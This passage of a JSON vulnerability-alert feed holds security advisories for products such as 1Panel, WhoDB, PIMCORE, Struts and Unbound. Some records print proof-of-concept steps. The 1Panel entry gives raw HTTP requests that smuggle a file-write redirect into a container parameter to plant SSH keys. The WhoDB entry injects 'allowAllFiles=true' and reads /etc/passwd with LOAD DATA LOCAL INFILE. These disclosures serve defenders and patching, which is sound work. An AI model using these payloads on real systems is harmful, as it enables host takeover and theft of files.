GHSA-75j3-gff7-55x3\n\ud83d\udd25 CVSS Score: 4.8 (CVSS_V3)\n\ud83d\udd39 Description: IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic.\n\ud83d\udccf Published: 2025-01-27T03:30:26Z\n\ud83d\udccf Modified: 2025-01-27T03:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-28770\n2. https://www.ibm.com/support/pages/node/7161444", "creation_timestamp": "2025-01-27T04:07:37.000000Z"}, {"uuid": "757ebe25-1096-40e5-b9fe-92322efa4249", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3W4-79RW-R73C", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3159", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-v3w4-79rw-r73c\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Crelly Slider WordPress plugin before 1.4.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13116\n2. https://wpscan.com/vulnerability/1755c8ad-7620-4b12-bba0-013e80c2691b", "creation_timestamp": "2025-01-27T07:07:47.000000Z"}, {"uuid": "bc11c072-2066-4637-ab02-6dc80ebed879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MVQ2-CPPV-F4GQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3161", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mvq2-cppv-f4gq\n\ud83d\udd25 CVSS Score: 6.2 (CVSS_V3)\n\ud83d\udd39 Description: Certain errors of the upstream libraries will insert sensitive information in the OTRS or ((OTRS)) Community Edition log mechanism and mails send to the system administrator.\n\nThis issue affects: \n\n  *  OTRS 7.0.X\n\n  *  OTRS 8.0.X\n  *  OTRS 2023.X\n  *  OTRS 2024.X\n\n  *  ((OTRS)) Community Edition: 6.0.x\n\nProducts based on the ((OTRS)) Community Edition also very likely to be affected\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-24389\n2. https://otrs.com/release-notes/otrs-security-advisory-2025-03", "creation_timestamp": "2025-01-27T07:07:48.000000Z"}, {"uuid": "35ff61a5-170d-4738-a653-e6bf9b349c93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PQH-P72C-FJ85", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3372", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-3978\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-01-29T10:15:07.750\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/cloudflare/cfrpki/security/advisories/GHSA-3pqh-p72c-fj85", "creation_timestamp": "2025-01-29T11:18:14.000000Z"}, {"uuid": "d2df7c3d-104c-407d-a8be-b83d2e4242b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PQH-P72C-FJ85", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3376", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-3978\n\ud83d\udd25 CVSS Score: 8.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nWhen copying files with rsync, octorpki uses the \"-a\" flag 0, which forces rsync to copy binaries with the suid bit set as root. Since the provided service definition defaults to root (https://github.com/cloudflare/cfrpki/blob/master/package/octorpki.service) this could allow for a vector, when combined with another vulnerability that causes octorpki to process a malicious TAL file, for a local privilege escalation.  \n\n## For more information\n\nIf you have any questions or comments about this advisory email us at security@cloudflare.com\n\ud83d\udccf Published: 2021-11-19T19:34:26Z\n\ud83d\udccf Modified: 2025-01-29T16:56:35Z\n\ud83d\udd17 References:\n1. https://github.com/cloudflare/cfrpki/security/advisories/GHSA-3pqh-p72c-fj85\n2. https://nvd.nist.gov/vuln/detail/CVE-2021-3978\n3. https://github.com/cloudflare/cfrpki", "creation_timestamp": "2025-01-29T17:11:10.000000Z"}, {"uuid": "44f52fc6-b007-413b-858b-e2e9b40d5171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR3M-6GQ6-22CG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3375", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-xr3m-6gq6-22cg\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\n \nA Stored Cross-Site Scripting (XSS) vulnerability in PIMCORE allows remote attackers to inject arbitrary web script or HTML via the PDF upload functionality. This can result in the execution of malicious scripts in the context of the user's browser when the PDF is viewed, leading to potential session hijacking, defacement of web pages, or unauthorized access to sensitive information.\n \n### Details\n \nThe vulnerability is present in the PDF upload functionality of the PIM Core Upload module. When a user uploads a PDF file, the application fails to properly sanitize the content, allowing embedded scripts to be executed when the PDF is viewed. The affected code is located in the file handling and rendering logic of the PDF upload feature.\n \n### PoC\n \n\n \n1. Log in as Administrator\n![image](https://github.com/user-attachments/assets/7945bbd7-5277-4a0e-8365-56e5df319bae)\n\n2. Hover to Assets\n![image](https://github.com/user-attachments/assets/f24645ee-d740-4a5e-81d1-b8bf48b71cce)\n\n \n3. Right click and click \"Add Asset(s) &gt; upload files\n![image](https://github.com/user-attachments/assets/0603cc90-44d8-423e-a01c-b0367fd929bd)\n\n \n4. Upload malicious pdf\n![image](https://github.com/user-attachments/assets/51aa609d-f100-4f46-b3bb-3d730e000a02)\n\n \n5. Click on search and select document\n![image](https://github.com/user-attachments/assets/7e945b26-4f8a-4e91-adea-8f46a0f17856)\n\n \n6. copy the path and open to a new tab \n\n[https://demo.pimcore.fun/admin/Sample C](https://demo.pimcore.fun/Sample%20Content/Documents/xssmaeitsec.pdf)\n \n![image](https://github.com/user-attachments/assets/500d49d6-42f7-4b64-8b01-117f439ace8d)\n\n7. XSS PDF can be access without authentication. \n\n \n![image](https://github.com/user-attachments/assets/7fb53fc2-2f65-42b3-9ed7-fc0413211a3f)\n\n Image showing no cookies indicator that there are no session currently in\n \n![image](https://github.com/user-attachments/assets/89f58fff-0dee-4520-9071-efd024c2f6d3)\n\n### Impact\nThis is a Stored Cross-Site Scripting (XSS) vulnerability. It impacts any user who views the malicious PDF, potentially leading to session hijacking, defacement of web pages, or unauthorized access to sensitive information. The severity is high due to the potential for significant impact on confidentiality and integrity.\n\ud83d\udccf Published: 2025-01-28T19:12:44Z\n\ud83d\udccf Modified: 2025-01-29T16:57:20Z\n\ud83d\udd17 References:\n1. https://github.com/pimcore/pimcore/security/advisories/GHSA-xr3m-6gq6-22cg\n2. https://github.com/pimcore/pimcore", "creation_timestamp": "2025-01-29T17:11:10.000000Z"}, {"uuid": "290bd76d-b046-444e-a063-39cedb67608e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C873-WFHP-WX5M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3203", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c873-wfhp-wx5m\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: In SP1\u2019s STARK verifier, the prover provided `chip_ordering` is used to fetch the index of the chips that have preprocessed columns. Prior to v4.0.0, the validation that this `chip_ordering` correctly provides these indexes was missing. In v4.0.0, this was fixed by adding a check that the indexed chip\u2019s name is equal to the name stored in the verifying key\u2019s chip information. \n\nIn the recursive verifier, every verifier program is generated beforehand and later checked for correctness by requiring a merkle proof to the precomputed merkle root of valid verifier keys. Therefore, the recursive verifier and the on-chain verifier were not affected by this vulnerability. \n\nThis code was audited twice, once as a part of the audit by KALOS and once by Cantina for v1.0.0. This bug was found by the Succinct team during preparation of v4.0.0. Out of abundance of caution, we will be deprecating all previous versions and freeze the corresponding verifiers.\n\nFurthermore, in the recursive verifier, the `is_complete` boolean flag is used to flag a proof of complete execution. Prior to v4.0.0, this flag was underconstrained in parts of our recursive verifier, such as the first layer of the recursion. In v4.0.0, this bug was fixed by adding appropriate calls to the `assert_complete` function, which constrains the correctness of the `is_complete` flag. This code was a part of the audit for v3.0.0. This bug affects the soundness of the Rust SDK for verifying compressed proofs, and the soundness of on-chain verifier for deferred proofs. \n\nThis issue was found by a combined effort from Aligned, LambdaClass and 3MI Labs, and was also independently found by Succinct during the preparation of v4.0.0. \n\nLastly, SP1\u2019s STARK verifier relied on logic inside Plonky3, one SP1's core dependencies, to check that the polynomial evaluation claims are correct using a FRI-based polynomial commitment scheme. To batch this check, multiple polynomial evaluation claims are combined using a random linear combination. Prior to v4.0.0, the individual evaluation claims were not observed into the challenger before sampling the coefficient for the random linear combination. In v4.0.0, this was fixed by observing all the evaluation claims into the challenger correctly inside of Plonky3.\n\nThis bug was found by Lev Soukhanov and Onur Kilic, and we have worked closely with the Plonky3 team to mitigate this vulnerability. We will be deprecating all previous versions and freezing their verifiers to ensure that versions with the vulnerability will not be used in production.\n\ud83d\udccf Published: 2025-01-15T21:25:54Z\n\ud83d\udccf Modified: 2025-01-28T02:03:05Z\n\ud83d\udd17 References:\n1. https://github.com/succinctlabs/sp1/security/advisories/GHSA-c873-wfhp-wx5m\n2. https://github.com/succinctlabs/sp1", "creation_timestamp": "2025-01-28T02:09:05.000000Z"}, {"uuid": "5af6906d-4ac5-4b9d-9f27-28e140c9a031", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1750", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "bf5bc251-d9d2-423d-abae-8bb3ceb1cbee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1751", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd25 CVSS Score: 8.0 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T06:31:35Z\n\ud83d\udccf Modified: 2025-01-31T00:30:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1488\n2. https://access.redhat.com/errata/RHSA-2024:1750\n3. https://access.redhat.com/errata/RHSA-2024:1751\n4. https://access.redhat.com/errata/RHSA-2024:1780\n5. https://access.redhat.com/errata/RHSA-2024:1801\n6. https://access.redhat.com/errata/RHSA-2024:1802\n7. https://access.redhat.com/errata/RHSA-2024:1804\n8. https://access.redhat.com/errata/RHSA-2024:2587\n9. https://access.redhat.com/errata/RHSA-2024:2696\n10. https://access.redhat.com/errata/RHSA-2025:0837\n11. https://access.redhat.com/security/cve/CVE-2024-1488\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-31T01:12:29.000000Z"}, {"uuid": "431c87b2-6863-40f2-8ab9-0f632f42d5d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5RV-W9PM-8QP8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3551", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0092\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-01-31T02:15:28.550\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/advisories/GHSA-x5rv-w9pm-8qp8\n2. https://github.com/juju/juju/commit/ef803e2a13692d355b784b7da8b4b1f01dab1556", "creation_timestamp": "2025-01-31T03:21:55.000000Z"}, {"uuid": "122c34f0-0fff-4c0e-9656-a25af8056753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5144", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-02-26T04:13:19.878Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-02-26T04:24:30.000000Z"}, {"uuid": "4b1df274-012d-4ea1-8993-30158f14ba56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24F2-FV38-3274", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3707", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24891\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-01-31T23:15:08.457\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/DumbWareio/DumbDrop/commit/cb586316648ccbfb21d27b84e90d72ccead9819d\n2. https://github.com/DumbWareio/DumbDrop/security/advisories/GHSA-24f2-fv38-3274", "creation_timestamp": "2025-02-01T01:25:35.000000Z"}, {"uuid": "31daef47-3d9c-4a64-9f0f-5f12bccb8cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRRC-WPFW-5HJ2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4288", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24904\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T16:16:49.053\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/whisperfish/libsignal-service-rs/commit/82d70f6720e762898f34ae76b0894b0297d9b2f8\n2. https://github.com/whisperfish/libsignal-service-rs/security/advisories/GHSA-hrrc-wpfw-5hj2", "creation_timestamp": "2025-02-13T17:15:13.000000Z"}, {"uuid": "3ee0e85c-68bf-456b-a35c-7519bf374439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8CH-W75V-C847", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3798", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-34352\n\ud83d\udd25 CVSS Score: 6.4 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\nThere are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.\nWe can use the following mirror configuration write symbol `&gt;` to achieve arbitrary file writing\n\n### PoC\nDockerfile\n```\nFROM bash:latest\n\nCOPY echo.sh /usr/local/bin/echo.sh\nRUN chmod +x /usr/local/bin/echo.sh\nCMD [\"echo.sh\"]\n```\necho.sh\n```\n#!/usr/local/bin/bash\necho \"Hello, World!\"\n```\nBuild this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container\nSend the following packet, taking care to change the containerID to the malicious container we constructed\n\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1&amp;since=all&amp;tail=100&amp;follow=true HTTP/1.1\nHost: xxxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nThen you can write any customized file to, for example, a ssh key, and generally the application is run with root privileges\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1&amp;since=all&amp;tail=100&amp;follow=true HTTP/1.1\nHost: xxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nOr write a timed task to execute any command.\n### Impact\nThe ability to write arbitrary files on the host where the service is deployed can lead to a host takeover\n\ud83d\udccf Published: 2024-05-09T15:14:24Z\n\ud83d\udccf Modified: 2025-02-07T17:47:10Z\n\ud83d\udd17 References:\n1. https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-34352\n3. https://github.com/1Panel-dev/1Panel\n4. https://pkg.go.dev/vuln/GO-2024-2830", "creation_timestamp": "2025-02-07T18:02:55.000000Z"}, {"uuid": "b775b10f-71dc-4021-9a6a-c4d79e718054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170907-STRUTS2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3799", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2017-9805\n\ud83d\udd25 CVSS Score: 8.1 (CVSS_V3)\n\ud83d\udd39 Description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.\n\ud83d\udccf Published: 2018-10-16T19:37:56Z\n\ud83d\udccf Modified: 2025-02-07T17:42:07Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2017-9805\n2. https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26\n3. https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a\n4. https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax\n5. https://bugzilla.redhat.com/show_bug.cgi?id=1488482\n6. https://cwiki.apache.org/confluence/display/WW/S2-052\n7. https://github.com/apache/struts\n8. https://lgtm.com/blog/apache_struts_CVE-2017-9805\n9. https://security.netapp.com/advisory/ntap-20170907-0001\n10. https://struts.apache.org/docs/s2-052.html\n11. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2\n12. https://web.archive.org/web/20170909031344/http://www.securityfocus.com/bid/100609\n13. https://web.archive.org/web/20170922053119/http://www.securitytracker.com/id/1039263\n14. https://www.exploit-db.com/exploits/42627\n15. https://www.kb.cert.org/vuls/id/112992\n16. http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n17. http://www.securityfocus.com/bid/100609\n18. http://www.securitytracker.com/id/1039263", "creation_timestamp": "2025-02-07T18:02:56.000000Z"}, {"uuid": "bb286cfc-5dfb-429a-adee-f94bc18c6984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7W4-9WV8-7X7C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3802", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24787\n\ud83d\udd25 CVSS Score: 8.7 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\n\nThe application is vulnerable to parameter injection in database connection strings, which allows an attacker to read local files on the machine the application is running on.\n\n### Details\n\nThe application uses string concatenation to build database connection URIs which are then passed to corresponding libraries responsible for setting up the database connections.\n\nThis string concatenation is done unsafely and without escaping or encoding the user input. This allows an user, in many cases, to inject arbitrary parameters into the URI string. These parameters can be potentially dangerous depending on the libraries used.\n\nOne of these dangerous parameters is `allowAllFiles` in the library `github.com/go-sql-driver/mysql`. Should this be set to `true`, the library enables running the `LOAD DATA LOCAL INFILE` query on any file on the host machine (in this case, the machine that WhoDB is running on). Source: https://github.com/go-sql-driver/mysql/blob/7403860363ca112af503b4612568c3096fecb466/infile.go#L128\n\nBy injecting `&amp;allowAllFiles=true` into the connection URI and connecting to any MySQL server (such as an attacker-controlled one), the attacker is able to read local files.\n\n### PoC\n\nAs this vulnerability does not require sending requests manually and can all be done using the WhoDB UI, screenshots are provided instead of HTTP requests.\n\nFor this proof-of-concept, a clean instance of WhoDB and MySQL were set up using podman (docker is a suitable alternative):\n\n```\npodman network create whodb-poc\npodman run -d -p 8080:8080 --network whodb-poc docker.io/clidey/whodb\npodman run -d --name mysql -e MYSQL_ROOT_PASSWORD=password --network whodb-poc docker.io/mysql:9\n```\n\nThe attacker connects to the database via WhoDB. Note that in the `Loc` field, the string `&amp;allowAllFiles=true` is inserted:\n\n![2025-01-21-13-28-08](https://github.com/user-attachments/assets/28709707-97e4-4d26-b61c-5462db6dd43f)\n\nAfter connecting, the attacker navigates to the scratchpad in `/scratchpad`.\n\nThe attacker first creates a demo table:\n```sql\nCREATE TABLE poc (\n    line TEXT\n);\n```\n\nThe attacker then enables loading files from the server side. For the sake of clarity, do note that while this is required, the file is not being read from the remote server where MySQL is running, but the local machine that WhoDB is running on.\n```sql\nSET GLOBAL local_infile=1;\n```\n\nThe attacker then uses the `LOAD DATA LOCAL INFILE` statement to read the contents of `/etc/passwd` (in this case from inside the container where WhoDB is running) into the previously created table:\n```sql\nLOAD DATA LOCAL INFILE '/etc/passwd'\nINTO TABLE poc\nFIELDS TERMINATED BY '\\0'\nLINES TERMINATED BY '\\n';\n```\n\nThe attacker then navigates to the `poc` table in the _Tables_ view and observes that the file has been read successfully:\n\n![2025-01-21-14-04-47](https://github.com/user-attachments/assets/c8f499ce-0d40-49ba-a2c6-fe2d12c677c5)\n\n### Impact\n\nWhile this proof-of-concept demonstrates local file inclusion, the root cause of the issue is the unsafe construction of database connection URIs from user input. Not all database connector libraries used in WhoDB were inspected; there may be libraries which allow for even more impactful parameters.\n\nThe attack requires no user authentication to WhoDB (only authentication to any database server, such as an attacker-controlled one) and no special configuration - the default configuration of the application is vulnerable.\n\ud83d\udccf Published: 2025-02-06T19:58:37Z\n\ud83d\udccf Modified: 2025-02-07T17:35:21Z\n\ud83d\udd17 References:\n1. https://github.com/clidey/whodb/security/advisories/GHSA-c7w4-9wv8-7x7c\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24787\n3. https://github.com/clidey/whodb/commit/8d67b767e00552e5eba2b1537179b74bfa662ee1\n4. https://github.com/clidey/whodb\n5. https://github.com/go-sql-driver/mysql/blob/7403860363ca112af503b4612568c3096fecb466/infile.go#L128", "creation_timestamp": "2025-02-07T18:03:02.000000Z"}, {"uuid": "ebd1701c-e7d2-4825-ac7e-1880884aadd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2016:0070", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3828", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2015-5317\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: The Fingerprints pages in Jenkins before 1.638 and LTS before 1.625.2 might allow remote attackers to obtain sensitive job and build name information via a direct request.\n\ud83d\udccf Published: 2022-05-13T01:30:06Z\n\ud83d\udccf Modified: 2025-02-07T20:53:19Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2015-5317\n2. https://github.com/jenkinsci/jenkins/commit/0594c4cbccd24d4883fc0150e8fc511c9da63eb4\n3. https://access.redhat.com/errata/RHSA-2016:0070\n4. https://github.com/jenkinsci/jenkins\n5. https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\n6. http://rhn.redhat.com/errata/RHSA-2016-0489.html", "creation_timestamp": "2025-02-07T21:03:01.000000Z"}, {"uuid": "f05dc7cf-7072-47ed-b18b-54dc86a621cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGGV-CV7R-MW98", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3831", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-22201\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nIf an HTTP/2 connection gets TCP congested, when 